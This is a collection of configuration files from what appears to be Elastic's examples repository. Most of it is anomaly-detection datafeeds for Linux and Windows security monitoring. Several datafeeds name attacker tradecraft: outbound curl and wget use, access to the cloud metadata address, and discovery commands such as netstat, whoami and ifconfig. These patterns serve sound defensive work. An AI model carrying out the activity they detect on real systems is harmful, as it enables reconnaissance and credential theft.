--------------------------------------------------------------------------------
1 | # Ignore any terraform specific folder & hidden files
2 | .terraform*
3 | # Ignore terraform state and vars
4 | terraform.tf*
5 | 


--------------------------------------------------------------------------------
/GCP Dataflow to Elasticsearch/.tool-versions:
--------------------------------------------------------------------------------
1 | terraform 1.0.3
2 | 


--------------------------------------------------------------------------------
/GCP Dataflow to Elasticsearch/README.md:
--------------------------------------------------------------------------------
 1 | # GCP Dataflow to Elasticsearch
 2 | 
 3 | This example shows how to set up a GCP Dataflow job that forwards GCP Audit logs to Elasticsearch.
 4 | 
 5 | ## Setup
 6 | 
 7 | The Terraform CLI is required for this example.
 8 | 
 9 | Install the `GCP` integration in your Elasticsearch cluster (this example was tested with version 1.0.1 of the integration), then run the standard Terraform workflow (see the sketch at the end of this README).
10 | 
11 | ## Versions
12 | 
13 | Tested with Terraform 1.0.3.
14 | 
15 | Tested with Elastic Stack 7.15.0.
16 | 
17 | 
18 | 
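19 | ## Usage
20 | 
21 | A minimal workflow sketch, assuming the required variables (for example `project_id` and `region` from main.tf) are supplied via a `terraform.tfvars` file:
22 | 
23 | ```
24 | terraform init
25 | terraform apply
26 | ```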


--------------------------------------------------------------------------------
/GCP Dataflow to Elasticsearch/main.tf:
--------------------------------------------------------------------------------
 1 | provider "google" {
 2 |   project = var.project_id
 3 |   region  = var.region
 4 | }
 5 | 
 6 | provider "google-beta" {
 7 |   project = var.project_id
 8 |   region  = var.region
 9 | }
10 | 


--------------------------------------------------------------------------------
/GKE-On-Prem/elasticsearch-hosts-ports:
--------------------------------------------------------------------------------
1 | Single line
2 | One or more URLs
3 | Double quotes around each URL
4 | Comma between each double quoted URL
5 | Square brackets around the list
6 | Remove these instructions once you edit the line below
7 | ["http://<hostname or IP>:<port>", "http://<hostname or IP>:<port>", "http://<hostname or IP>:<port>"]
8 | 


--------------------------------------------------------------------------------
/GKE-On-Prem/kibana-host-port:
--------------------------------------------------------------------------------
1 | Single line
2 | One URL
3 | Double quotes around the URL
4 | Remove these instructions once you edit the line below
5 | "http://<hostname or IP>:<port>"
6 | 


--------------------------------------------------------------------------------
/Graph/apache_logs_security_analysis/filebeat_secrepo.yml:
--------------------------------------------------------------------------------
 1 | filebeat.prospectors:
 2 | - input_type: log
 3 |   paths:
 4 |     - ./data/access*
 5 |   document_type: logs
 6 |   harvester_limit: 100
 7 |   close_eof: true
 8 | 
 9 | output.elasticsearch:
10 |   hosts: ["localhost:9200"]
11 |   index: "secrepo"
12 |   username: elastic
13 |   password: changeme
14 |   template.enabled: true
15 |   template.name: secrepo
16 |   template.path: "secrepo.json"
17 |   template.overwrite: true
18 |   pipeline: secrepo_pipeline


--------------------------------------------------------------------------------
/Graph/apache_logs_security_analysis/logstash/patterns/custom:
--------------------------------------------------------------------------------
1 | HTTP_METHOD GET|POST|PUT|HEAD|OPTIONS|TRACE|PROPFIND
2 | HTTP_VERSION HTTP/%{BASE10NUM}
3 | URL_PARTS %{DATA:url}(%{URIPARAM:params})?


--------------------------------------------------------------------------------
/Graph/apache_logs_security_analysis/requirements.txt:
--------------------------------------------------------------------------------
1 | python-dateutil==2.6.0
2 | requests==2.12.1
3 | six==1.10.0
4 | 


--------------------------------------------------------------------------------
/Graph/apache_logs_security_analysis/secrepo_graph.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Graph/apache_logs_security_analysis/secrepo_graph.jpg


--------------------------------------------------------------------------------
/Graph/movie_recommendations/movie_lens_date_clustering.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Graph/movie_recommendations/movie_lens_date_clustering.jpg


--------------------------------------------------------------------------------
/Graph/movie_recommendations/movie_lens_example_graph.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Graph/movie_recommendations/movie_lens_example_graph.jpg


--------------------------------------------------------------------------------
/Graph/movie_recommendations/movie_lens_total_reviews_by_date.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Graph/movie_recommendations/movie_lens_total_reviews_by_date.png


--------------------------------------------------------------------------------
/Graph/movie_recommendations/requirements.txt:
--------------------------------------------------------------------------------
1 | elasticsearch==5.0.1
2 | requests==2.12.1
3 | six==1.10.0
4 | urllib3==1.19.1
5 | 


--------------------------------------------------------------------------------
/Machine Learning/Analytics Jupyter Notebooks/README.md:
--------------------------------------------------------------------------------
 1 | ## Kibana Sample Flights Data Classification Example
 2 | 
 3 | Set up a local instance of Jupyter using the following instructions:
 4 | 
 5 | 1. Set up a virtual environment called `env` 
 6 | 
 7 | ```
 8 | python3 -m venv env
 9 | ``` 
10 | 
11 | 2. Activate it
12 | 
13 | ```
14 | source env/bin/activate
15 | ```
16 | 
17 | 3. Install the required dependencies for your chosen Jupyter notebook
18 | 
19 | ```
20 | pip install -r some-requirements-file-name.txt
21 | ```
22 | 
23 | 4. Launch Jupyter
24 | 
25 | ```
26 | jupyter notebook
27 | ```
28 | 
29 | 
30 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/security_linux/logo.json:
--------------------------------------------------------------------------------
1 | {
2 |   "icon": "logoSecurity"
3 | }
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/security_windows/logo.json:
--------------------------------------------------------------------------------
1 | {
2 |   "icon": "logoSecurity"
3 | }
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/security_windows/ml/datafeed_v2_windows_rare_metadata_process.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "JOB_ID",
 3 |   "indices": [
 4 |     "INDEX_PATTERN_NAME"
 5 |   ],
 6 |   "max_empty_searches": 10,
 7 |   "query": {
 8 |     "bool": {
 9 |       "filter": [
10 |         {
11 |           "term": {
12 |             "host.os.family": "windows"
13 |           }
14 |         },
15 |         {
16 |           "term": {
17 |             "destination.ip": "169.254.169.254"
18 |           }
19 |         }
20 |       ]
21 |     }
22 |   }
23 | }
24 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/security_windows/ml/datafeed_v2_windows_rare_metadata_user.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "JOB_ID",
 3 |   "indices": [
 4 |     "INDEX_PATTERN_NAME"
 5 |   ],
 6 |   "max_empty_searches": 10,
 7 |   "query": {
 8 |     "bool": {
 9 |       "filter": [
10 |         {
11 |           "term": {
12 |             "host.os.family": "windows"
13 |           }
14 |         },
15 |         {
16 |           "term": {
17 |             "destination.ip": "169.254.169.254"
18 |           }
19 |         }
20 |       ]
21 |     }
22 |   }
23 | }
24 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/logo.json:
--------------------------------------------------------------------------------
1 | {
2 | 	"icon": "logoSecurity"
3 | }
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_anomalous_network_activity_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |             "bool": {
 9 |               "filter": [
10 |                 {"term": {"event.action": "connected-to"}},
11 |                 {"term": {"agent.type": "auditbeat"}}
12 |               ],
13 |               "must_not": [
14 |                 {
15 |                   "bool": {
16 |                     "should": [
17 |                       {"term": {"destination.ip": "127.0.0.1"}},
18 |                       {"term": {"destination.ip": "127.0.0.53"}},
19 |                       {"term": {"destination.ip": "::1"}}
20 |                     ],
21 |                     "minimum_should_match": 1
22 |                   }
23 |                 }
24 |               ]
25 |             }
26 |         }
27 |     }
28 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_anomalous_network_port_activity_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [
10 |           {"term": {"event.action": "connected-to"}},
11 |           {"term": {"agent.type": "auditbeat"}}
12 |         ],
13 |         "must_not": [
14 |           {
15 |             "bool": {
16 |               "should": [
17 |                 {"term": {"destination.ip":"::1"}},
18 |                 {"term": {"destination.ip":"127.0.0.1"}},
19 |                 {"term": {"destination.ip":"::"}},
20 |                 {"term": {"user.name_map.uid":"jenkins"}}
21 |               ],
22 |               "minimum_should_match": 1
23 |             }
24 |           }
25 |         ]
26 |       }
27 |     }
28 |   }
29 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_anomalous_network_service.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [
10 |           {"term": {"event.action": "bound-socket"}},
11 |           {"term": {"agent.type": "auditbeat"}}
12 |         ],
13 |         "must_not": [
14 |           {
15 |             "bool": {
16 |               "should": [
17 |                 {"term": {"process.name": "dnsmasq"}},
18 |                 {"term": {"process.name": "docker-proxy"}},
19 |                 {"term": {"process.name": "rpcinfo"}}
20 |               ],
21 |               "minimum_should_match": 1
22 |             }
23 |           }
24 |         ]
25 |       }
26 |     }
27 | }
28 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_anomalous_network_url_activity_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [
10 |           {"exists": {"field": "destination.ip"}},
11 |           {"terms": {"process.name": ["curl", "wget"]}},
12 |           {"term": {"agent.type": "auditbeat"}}
13 |         ],
14 |         "must_not": [
15 |           {
16 |             "bool": {
17 |               "should": [
18 |                 {"term": {"destination.ip": "::1"}},
19 |                 {"term": {"destination.ip": "127.0.0.1"}},
20 |                 {"term": {"destination.ip": "169.254.169.254"}}
21 |               ],
22 |               "minimum_should_match": 1
23 |             }
24 |           }
25 |         ]
26 |       }
27 |     }
28 | }
29 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_anomalous_process_all_hosts_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"terms": {"event.action": ["process_started", "executed"]}},
11 |             {"term": {"agent.type": "auditbeat"}}
12 |           ],
13 |           "must_not": [
14 |             {
15 |               "bool": {
16 |                 "should": [
17 |                   {"term": {"user.name": "jenkins-worker"}},
18 |                   {"term": {"user.name": "jenkins-user"}},
19 |                   {"term": {"user.name": "jenkins"}},
20 |                   {"wildcard": {"process.name": {"wildcard": "jenkins*"}}}
21 |                 ],
22 |                 "minimum_should_match": 1
23 |               }
24 |             }
25 |           ]
26 |         }
27 |     }
28 | }
29 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_anomalous_user_name_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [
10 |           {"terms": {"event.action": ["process_started", "executed"]}},
11 |           {"term": {"agent.type": "auditbeat"}}
12 |         ]
13 |       }
14 |     }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_network_configuration_discovery.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |             "must": [
10 |               {
11 |                 "bool": {
12 |                   "should": [
13 |                     {"term": {"process.name": "arp"}},
14 |                     {"term": {"process.name": "echo"}},
15 |                     {"term": {"process.name": "ethtool"}},
16 |                     {"term": {"process.name": "ifconfig"}},
17 |                     {"term": {"process.name": "ip"}},
18 |                     {"term": {"process.name": "iptables"}},
19 |                     {"term": {"process.name": "ufw"}}
20 |                   ]
21 |                 }
22 |               }
23 |             ]
24 |         }
25 |     }
26 | }
27 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_network_connection_discovery.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |             "must": [
10 |               {
11 |                 "bool": {
12 |                   "should": [
13 |                     {"term": {"process.name": "netstat"}},
14 |                     {"term": {"process.name": "ss"}},
15 |                     {"term": {"process.name": "route"}},
16 |                     {"term": {"process.name": "showmount"}}
17 |                   ]
18 |                 }
19 |               }
20 |             ]
21 |         }
22 |     }
23 | }
24 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_rare_kernel_module_arguments.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |             "filter": [{"exists": {"field": "process.title"}}],
10 |             "must": [
11 |                 {"bool": {
12 |                     "should": [
13 |                     {"term": {"process.name": "insmod"}},
14 |                     {"term": {"process.name": "kmod"}},
15 |                     {"term": {"process.name": "modprobe"}},
16 |                     {"term": {"process.name": "rmod"}}
17 |                     ]
18 |                 }}
19 |             ]
20 |         }
21 |     }
22 | }
23 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_rare_metadata_process.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [{"term": {"destination.ip": "169.254.169.254"}}]
10 |       }
11 |     }
12 |   }
13 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_rare_metadata_user.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [{"term": {"destination.ip": "169.254.169.254"}}]
10 |       }
11 |     }
12 |   }
13 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_rare_sudo_user.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [
10 |           {"term": {"event.action": "executed"}},
11 |           {"term": {"process.name": "sudo"}}
12 |         ]
13 |       }
14 |     }
15 |   }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_rare_user_compiler.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |             "filter": [{"term": {"event.action": "executed"}}],
10 |             "must": [
11 |               {"bool": {
12 |                   "should": [
13 |                     {"term": {"process.name": "compile"}},
14 |                     {"term": {"process.name": "gcc"}},
15 |                     {"term": {"process.name": "make"}},
16 |                     {"term": {"process.name": "yasm"}}
17 |                   ]
18 |                 }}
19 |             ]
20 |         }
21 |     }
22 | }
23 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_system_process_discovery.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |             "must": [
10 |               {
11 |                 "bool": {
12 |                   "should": [
13 |                     {"term": {"process.name": "ps"}},
14 |                     {"term": {"process.name": "top"}}
15 |                   ]
16 |                 }
17 |               }
18 |             ]
19 |         }
20 |     }
21 | }
22 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_system_user_discovery.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |             "must": [
10 |               {
11 |                 "bool": {
12 |                   "should": [
13 |                     {"term": {"process.name": "users"}},
14 |                     {"term": {"process.name": "w"}},
15 |                     {"term": {"process.name": "who"}},
16 |                     {"term": {"process.name": "whoami"}}
17 |                   ]
18 |                 }
19 |               }
20 |             ]
21 |         }
22 |     }
23 | }
24 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_rare_process_by_host_linux_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [
10 |           {"terms": {"event.action": ["process_started", "executed"]}},
11 |           {"term": {"agent.type": "auditbeat"}}
12 |         ]
13 |       }
14 |     }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat_auth/logo.json:
--------------------------------------------------------------------------------
1 | {
2 | 	"icon": "logoSecurity"
3 | }
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat_auth/manifest.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "id": "siem_auditbeat_auth",
 3 |   "title": "Security: Auditbeat Authentication",
 4 |   "description": "Detect suspicious authentication events in Auditbeat data.",
 5 |   "type": "Auditbeat data",
 6 |   "logoFile": "logo.json",
 7 |   "defaultIndexPattern": "auditbeat-*",
 8 |   "query": {
 9 |     "bool": {
10 |       "filter": [
11 |         {"term": {"event.category": "authentication"}},
12 |         {"term": {"agent.type": "auditbeat"}}
13 |       ],
14 |       "must_not": { "terms": { "_tier": [ "data_frozen", "data_cold" ] } }
15 |     }
16 |   },
17 |   "jobs": [
18 |     {
19 |       "id": "suspicious_login_activity_ecs",
20 |       "file": "suspicious_login_activity_ecs.json"
21 |     }
22 |   ],
23 |   "datafeeds": [
24 |     {
25 |       "id": "datafeed-suspicious_login_activity_ecs",
26 |       "file": "datafeed_suspicious_login_activity_ecs.json",
27 |       "job_id": "suspicious_login_activity_ecs"
28 |     }
29 |   ]
30 | }
31 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat_auth/ml/datafeed_suspicious_login_activity_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "JOB_ID",
 3 |   "indices": [
 4 |     "INDEX_PATTERN_NAME"
 5 |   ],
 6 |   "max_empty_searches": 10,
 7 |   "query": {
 8 |     "bool": {
 9 |       "filter": [
10 |         {"term": { "event.category": "authentication" }},
11 |         {"term": { "agent.type": "auditbeat" }}
12 |       ]
13 |     }
14 |   }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/logo.json:
--------------------------------------------------------------------------------
1 | {
2 | 	"icon": "logoSecurity"
3 | }
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_rare_process_by_host_windows_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [
10 |           {"term": { "event.action": "Process Create (rule: ProcessCreate)" }},
11 |           {"term": {"agent.type": "winlogbeat"}}
12 |         ]
13 |       }
14 |     }
15 |   }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_network_activity_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.action": "Network connection detected (rule: NetworkConnect)"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ],
13 |           "must_not": [
14 |             {
15 |               "bool": {
16 |                 "should": [
17 |                   {"term": {"destination.ip": "127.0.0.1"}},
18 |                   {"term": {"destination.ip": "127.0.0.53"}},
19 |                   {"term": {"destination.ip": "::1"}}
20 |                 ],
21 |                 "minimum_should_match": 1
22 |               }
23 |             }
24 |           ]
25 |         }
26 |     }
27 | }
28 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_path_activity_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.action": "Process Create (rule: ProcessCreate)"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ]
13 |         }
14 |       }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_process_all_hosts_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.action": "Process Create (rule: ProcessCreate)"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ]
13 |         }
14 |       }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_process_creation.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.action": "Process Create (rule: ProcessCreate)"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ]
13 |       }
14 |     }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_script.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"winlog.channel": "Microsoft-Windows-PowerShell/Operational"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ]
13 |         }
14 |       }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_service.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.code": "7045"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ]
13 |         }
14 |       }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_user_name_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.action": "Process Create (rule: ProcessCreate)"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ]
13 |         }
14 |       }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_rare_metadata_process.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [{"term": {"destination.ip": "169.254.169.254"}}]
10 |       }
11 |     }
12 |   }
13 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_rare_metadata_user.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [{"term": {"destination.ip": "169.254.169.254"}}]
10 |       }
11 |     }
12 |   }
13 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_rare_user_runas_event.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [
10 |           {"term": {"event.code": "4648"}},
11 |           {"term": {"agent.type": "winlogbeat"}}
12 |         ]
13 |       }
14 |     }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat_auth/logo.json:
--------------------------------------------------------------------------------
1 | {
2 | 	"icon": "logoSecurity"
3 | }
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat_auth/manifest.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "id": "siem_winlogbeat_auth",
 3 |   "title": "Security: Winlogbeat Authentication",
 4 |   "description": "Detect suspicious authentication events in Winlogbeat data.",
 5 |   "type": "Winlogbeat data",
 6 |   "logoFile": "logo.json",
 7 |   "defaultIndexPattern": "winlogbeat-*",
 8 |   "query": {
 9 |     "bool": {
10 |       "filter": [
11 |         {"term": {"agent.type": "winlogbeat"}},
12 |         {"term": {"event.category": "authentication"}}
13 |       ],
14 |       "must_not": { "terms": { "_tier": [ "data_frozen", "data_cold" ] } }
15 |     }
16 |   },
17 |   "jobs": [
18 |     {
19 |       "id": "windows_rare_user_type10_remote_login",
20 |       "file": "windows_rare_user_type10_remote_login.json"
21 |     }
22 |   ],
23 |   "datafeeds": [
24 |     {
25 |       "id": "datafeed-windows_rare_user_type10_remote_login",
26 |       "file": "datafeed_windows_rare_user_type10_remote_login.json",
27 |       "job_id": "windows_rare_user_type10_remote_login"
28 |     }
29 |   ]
30 | }
31 | 


--------------------------------------------------------------------------------
/Machine Learning/Business Metrics Recipes/README.md:
--------------------------------------------------------------------------------
1 | Each subfolder contains information that will allow you to configure, run, and test an example Business Metrics machine learning use case. Business Metrics use cases detect anomalies in metrics/KPIs that are directly associated with, or may impact, business performance. Each detected anomaly is assigned a normalized Anomaly Score and is annotated with the values of other fields in the data that have a statistical influence on the anomaly; these fields are called influencers.
2 | 


--------------------------------------------------------------------------------
/Machine Learning/Business Metrics Recipes/twitter_trends/configs/filebeat/filebeat.yml:
--------------------------------------------------------------------------------
 1 | filebeat.prospectors:
 2 | - input_type: log
 3 |   paths:
 4 |     - tweets.csv
 5 |   fields:
 6 |     topic: apm
 7 |   json.keys_under_root: true
 8 | 
 9 | output.elasticsearch:
10 |   hosts: ["localhost:9200"]
11 |   username: "elastic"
12 |   password: "changeme"
13 |   index: "twitter-test"
14 |   template.enabled: true
15 |   template.path: "twitter.json"
16 |   template.overwrite: true


--------------------------------------------------------------------------------
/Machine Learning/Business Metrics Recipes/twitter_trends/configs/logstash/logstash.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   twitter {
 3 |     consumer_key       => "INSERT YOUR CONSUMER KEY"
 4 |     consumer_secret    => "INSERT YOUR CONSUMER SECRET"
 5 |     oauth_token        => "INSERT YOUR ACCESS TOKEN"
 6 |     oauth_token_secret => "INSERT YOUR ACCESS TOKEN SECRET"
 7 |     keywords           => [ "thor", "spiderman", "wolverine", "ironman", "hulk"]
